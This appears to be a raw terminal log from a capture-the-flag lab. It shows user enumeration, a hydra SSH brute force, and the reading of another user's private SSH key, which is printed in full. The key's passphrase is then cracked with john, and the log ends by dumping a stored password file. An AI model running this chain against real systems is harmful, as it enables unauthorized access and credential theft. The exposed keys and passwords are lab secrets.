S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
S-1-22-1-1002 Unix User\ubuntu (Local User)
=============================================
| Getting printer info for 10.10.115.56 |
=============================================
No printers returned.
enum4linux complete on Fri Oct 10 17:52:25 2025
root@ip-10-10-91-159:~# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.115.56
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-10 17:55:01
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]
Options:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
Example: hydra -l user -P passlist.txt ftp://192.168.0.1
root@ip-10-10-91-159:~# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.115.56 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-10 17:55:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.115.56:22/
[STATUS] 163.00 tries/min, 163 tries in 00:01h, 14344239 to do in 1466:42h, 16 active
[STATUS] 113.33 tries/min, 340 tries in 00:03h, 14344062 to do in 2109:26h, 16 active
^[c^[c^[c^[c^[c^C^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ssh jan@10.10.115.56
The authenticity of host '10.10.115.56 (10.10.115.56)' can't be established.
ECDSA key fingerprint is SHA256:+sOi3lwJs5CmmXNN38BxmKzbEJySyCbGqjetaazoEsI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.115.56' (ECDSA) to the list of known hosts.
jan@10.10.115.56's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-139-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri 10 Oct 2025 01:13:49 PM EDT
System load: 0.0 Processes: 107
Usage of /: 49.8% of 13.62GB Users logged in: 0
Memory usage: 48% IPv4 address for eth0: 10.10.115.56
Swap usage: 0%
Expanded Security Maintenance for Infrastructure is not enabled.
0 updates can be applied immediately.
Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Your Hardware Enablement Stack (HWE) is supported until April 2025.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@ip-10-10-115-56:~$
jan@ip-10-10-115-56:~$
jan@ip-10-10-115-56:~$
jan@ip-10-10-115-56:~$
jan@ip-10-10-115-56:~$
jan@ip-10-10-115-56:~$ ls
jan@ip-10-10-115-56:~$ cd /home
jan@ip-10-10-115-56:/home$ la
la: command not found
jan@ip-10-10-115-56:/home$ ls
jan kay ubuntu
jan@ip-10-10-115-56:/home$ sudo su kay
[sudo] password for jan:
jan is not in the sudoers file. This incident will be reported.
jan@ip-10-10-115-56:/home$ ls
jan kay ubuntu
jan@ip-10-10-115-56:/home$ cd kay
jan@ip-10-10-115-56:/home/kay$ ls -a
. .bash_logout .lesshst .profile .viminfo
.. .bashrc .nano .ssh
.bash_history .cache pass.bak .sudo_as_admin_successful
jan@ip-10-10-115-56:/home/kay$ cat .sudo_as_admin_successful
jan@ip-10-10-115-56:/home/kay$ sudo cat .sudo_as_admin_successful
[sudo] password for jan:
jan is not in the sudoers file. This incident will be reported.
jan@ip-10-10-115-56:/home/kay$ ssh kay@10.10.115.56
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.115.56 (10.10.115.56)' can't be established.
ECDSA key fingerprint is SHA256:+sOi3lwJs5CmmXNN38BxmKzbEJySyCbGqjetaazoEsI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
kay@10.10.115.56's password:
Permission denied, please try again.
kay@10.10.115.56's password:
jan@ip-10-10-115-56:/home/kay$ ls
pass.bak
jan@ip-10-10-115-56:/home/kay$ ls -a
. .bash_logout .lesshst .profile .viminfo
.. .bashrc .nano .ssh
.bash_history .cache pass.bak .sudo_as_admin_successful
jan@ip-10-10-115-56:/home/kay$ cd .ssh
jan@ip-10-10-115-56:/home/kay/.ssh$ ll
ll: command not found
jan@ip-10-10-115-56:/home/kay/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
jan@ip-10-10-115-56:/home/kay/.ssh$ ssh -i authorized_keys kay@10.10.115.56
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.115.56 (10.10.115.56)' can't be established.
ECDSA key fingerprint is SHA256:+sOi3lwJs5CmmXNN38BxmKzbEJySyCbGqjetaazoEsI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Load key "authorized_keys": invalid format
kay@10.10.115.56's password:
jan@ip-10-10-115-56:/home/kay/.ssh$ ssh -i "authorized_keys" kay@10.10.115.56
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.115.56 (10.10.115.56)' can't be established.
ECDSA key fingerprint is SHA256:+sOi3lwJs5CmmXNN38BxmKzbEJySyCbGqjetaazoEsI.
Are you sure you want to continue connecting (yes/no/[fingerprint])?
Host key verification failed.
jan@ip-10-10-115-56:/home/kay/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
jan@ip-10-10-115-56:/home/kay/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
jan@ip-10-10-115-56:/home/kay/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCzAsDwjb0ft4IO7Kyux8DWocNiS1aJqpdVEo+gfk8Ng624b9qOQp7LOWDMVIINfCuzkTA3ZugSyo1OehPc0iyD7SfJIMzsETFvlHB3DlLLeNFm11hNeUBCF4Lt6o9uH3lcTuPVyZAvbAt7xD66bKjyEUy3hrpSnruN+M0exdSjaV54PI9TBFkUmmqpXsrWzMj1QaxBxZMq3xaBxTsFvW2nEx0rPOrnltQM4bdAvmvSXtuxLw6e5iCaAy1eoTHw0N6IfeGvwcHXIlCT25gH1gRfS0/NdR9cs78ylxYTLDnNvkxL1J3cVzVHJ/ZfOOWOCK4iJ/K8PIbSnYsBkSnrIlDX27PM7DZCBu+xhIwV5z4hRwwZZG5VcU+nDZZYr4xtpPbQcIQWYjVwr5vF3vehk57ymIWLwNqU/rSnZ0wZH8MURhVFaNOdr/0184Z1dJZ34u3NbIBxEV9XsjAh/L52Dt7DNHWqUJKIL1/NV96LKDqHKCXCRFBOh9BgqJUIAXoDdWLtBunFKu/tgCz0n7SIPSZDxJDhF4StAhFbGCHP9NIMvB890FjJE/vys/PuY3efX1GjTdAijRa019M2f8d0OnJpktNwCIMxEjvKyGQKGPLtTS8o0UAgLfV50Zuhg7H5j6RAJoSgFOtlosnFzwNuxxU05ozHuJ59wsmn5LMK97sbow== I don't have to type a long password anymore!
jan@ip-10-10-115-56:/home/kay/.ssh$ exit
logout
Connection to 10.10.115.56 closed.
root@ip-10-10-91-159:~# touch ssh_ket.pem
root@ip-10-10-91-159:~# ls
burp.json Downloads Pictures Scripts staff.txt
CTFBuilder hydra.restore Postman snap thinclient_drives
Desktop Instructions Rooms ssh_ket.pem Tools
root@ip-10-10-91-159:~# vi ssh_ket.pem
root@ip-10-10-91-159:~# ls -l
total 150732
-rw-r--r-- 1 root root 13154 May 6 2024 burp.json
drwxr-xr-x 2 root root 4096 May 6 2024 CTFBuilder
drwxr-xr-x 4 root root 4096 May 23 09:44 Desktop
drwxr-xr-x 2 root root 4096 Nov 19 2024 Downloads
-rw-r--r-- 1 root root 154275923 Oct 10 18:01 hydra.restore
drwxr-xr-x 2 root root 4096 May 7 2024 Instructions
drwxr-xr-x 3 root root 4096 May 16 12:28 Pictures
drwxr-xr-x 3 root root 4096 Aug 16 2020 Postman
drwxr-xr-x 41 root root 4096 May 23 09:40 Rooms
drwxr-xr-x 2 root root 4096 Oct 10 09:10 Scripts
drwx------ 5 root root 4096 May 16 12:34 snap
-rw-r--r-- 1 root root 772 Oct 10 18:25 ssh_ket.pem
-rw-r--r-- 1 root root 173 Oct 10 17:49 staff.txt
drwxr-xr-t 2 root root 4096 Aug 13 2020 thinclient_drives
lrwxrwxrwx 1 root root 19 Mar 18 2021 Tools -> /root/Desktop/Tools
root@ip-10-10-91-159:~# chmod 600 ssh_ket.pem
root@ip-10-10-91-159:~# ls -l
total 150732
-rw-r--r-- 1 root root 13154 May 6 2024 burp.json
drwxr-xr-x 2 root root 4096 May 6 2024 CTFBuilder
drwxr-xr-x 4 root root 4096 May 23 09:44 Desktop
drwxr-xr-x 2 root root 4096 Nov 19 2024 Downloads
-rw-r--r-- 1 root root 154275923 Oct 10 18:01 hydra.restore
drwxr-xr-x 2 root root 4096 May 7 2024 Instructions
drwxr-xr-x 3 root root 4096 May 16 12:28 Pictures
drwxr-xr-x 3 root root 4096 Aug 16 2020 Postman
drwxr-xr-x 41 root root 4096 May 23 09:40 Rooms
drwxr-xr-x 2 root root 4096 Oct 10 09:10 Scripts
drwx------ 5 root root 4096 May 16 12:34 snap
-rw------- 1 root root 772 Oct 10 18:25 ssh_ket.pem
-rw-r--r-- 1 root root 173 Oct 10 17:49 staff.txt
drwxr-xr-t 2 root root 4096 Aug 13 2020 thinclient_drives
lrwxrwxrwx 1 root root 19 Mar 18 2021 Tools -> /root/Desktop/Tools
root@ip-10-10-91-159:~# ssh -i ssh_ket.pem kay@10.10.115.56
Load key "ssh_ket.pem": invalid format
kay@10.10.115.56's password:
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ^C
root@ip-10-10-91-159:~# ssh jan@10.10.115.56
jan@10.10.115.56's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-139-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri 10 Oct 2025 01:27:28 PM EDT
System load: 0.0 Processes: 107
Usage of /: 49.8% of 13.62GB Users logged in: 0
Memory usage: 47% IPv4 address for eth0: 10.10.115.56
Swap usage: 0%
Expanded Security Maintenance for Infrastructure is not enabled.
0 updates can be applied immediately.
Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Oct 10 13:13:51 2025 from 10.10.91.159
jan@ip-10-10-115-56:~$ ls -l
total 0
jan@ip-10-10-115-56:~$ cd /home
jan@ip-10-10-115-56:/home$ ll
ll: command not found
jan@ip-10-10-115-56:/home$ cd kay/
jan@ip-10-10-115-56:/home/kay$ ls -a
. .bash_logout .lesshst .profile .viminfo
.. .bashrc .nano .ssh
.bash_history .cache pass.bak .sudo_as_admin_successful
jan@ip-10-10-115-56:/home/kay$ cd .ssh/
jan@ip-10-10-115-56:/home/kay/.ssh$ ls -l
total 12
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
jan@ip-10-10-115-56:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
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
-----END RSA PRIVATE KEY-----
jan@ip-10-10-115-56:/home/kay/.ssh$ exit
logout
Connection to 10.10.115.56 closed.
root@ip-10-10-91-159:~# ls
burp.json Downloads Pictures Scripts staff.txt
CTFBuilder hydra.restore Postman snap thinclient_drives
Desktop Instructions Rooms ssh_ket.pem Tools
root@ip-10-10-91-159:~# vi s
snap/ ssh_ket.pem staff.txt
root@ip-10-10-91-159:~# vi ssh_ket.pem
root@ip-10-10-91-159:~# ssh -i ssh_ket.pem kay@10.10.115.56
Enter passphrase for key 'ssh_ket.pem':
kay@10.10.115.56's password:
Permission denied, please try again.
kay@10.10.115.56's password:
Permission denied, please try again.
kay@10.10.115.56's password:
Connection closed by 10.10.115.56 port 22
root@ip-10-10-91-159:~#
root@ip-10-10-91-159:~#
root@ip-10-10-91-159:~#
root@ip-10-10-91-159:~# python ssh2john.py ssh_ket.pem > id_rsa_conv
root@ip-10-10-91-159:~# ls -l
total 150752
-rw-r--r-- 1 root root 13154 May 6 2024 burp.json
drwxr-xr-x 2 root root 4096 May 6 2024 CTFBuilder
drwxr-xr-x 4 root root 4096 May 23 09:44 Desktop
drwxr-xr-x 2 root root 4096 Nov 19 2024 Downloads
-rw-r--r-- 1 root root 154275923 Oct 10 18:01 hydra.restore
-rw-r--r-- 1 root root 4767 Oct 10 18:34 id_rsa_conv
drwxr-xr-x 2 root root 4096 May 7 2024 Instructions
drwxr-xr-x 3 root root 4096 May 16 12:28 Pictures
drwxr-xr-x 3 root root 4096 Aug 16 2020 Postman
drwxr-xr-x 41 root root 4096 May 23 09:40 Rooms
drwxr-xr-x 2 root root 4096 Oct 10 09:10 Scripts
drwx------ 5 root root 4096 May 16 12:34 snap
-rwxr-xr-x 1 root root 8696 Sep 2 2020 ssh2john.py
-rw------- 1 root root 3327 Oct 10 18:29 ssh_ket.pem
-rw-r--r-- 1 root root 173 Oct 10 17:49 staff.txt
drwxr-xr-t 2 root root 4096 Aug 13 2020 thinclient_drives
lrwxrwxrwx 1 root root 19 Mar 18 2021 Tools -> /root/Desktop/Tools
root@ip-10-10-91-159:~#
root@ip-10-10-91-159:~#
root@ip-10-10-91-159:~#
root@ip-10-10-91-159:~#
root@ip-10-10-91-159:~#
root@ip-10-10-91-159:~#
root@ip-10-10-91-159:~#
root@ip-10-10-91-159:~#
root@ip-10-10-91-159:~# john id_rsa_conv --wordlist=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (ssh_ket.pem)
1g 0:00:00:08 DONE (2025-10-10 18:39) 0.1243g/s 1783Kp/s 1783Kc/s 1783KC/s *7¡Vamos!
Session completed.
root@ip-10-10-91-159:~# ssh -i ssh_ket.pem kay@10.10.115.56
Enter passphrase for key 'ssh_ket.pem':
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-139-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri 10 Oct 2025 01:40:49 PM EDT
System load: 0.0 Processes: 107
Usage of /: 49.9% of 13.62GB Users logged in: 0
Memory usage: 47% IPv4 address for eth0: 10.10.115.56
Swap usage: 0%
Expanded Security Maintenance for Infrastructure is not enabled.
0 updates can be applied immediately.
Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Sun Jun 22 13:40:04 2025 from 10.23.8.228
kay@ip-10-10-115-56:~$ cd ~
kay@ip-10-10-115-56:~$ ls -a
. .bash_history .bashrc .lesshst pass.bak .ssh .viminfo
.. .bash_logout .cache .nano .profile .sudo_as_admin_successful
kay@ip-10-10-115-56:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@ip-10-10-115-56:~$
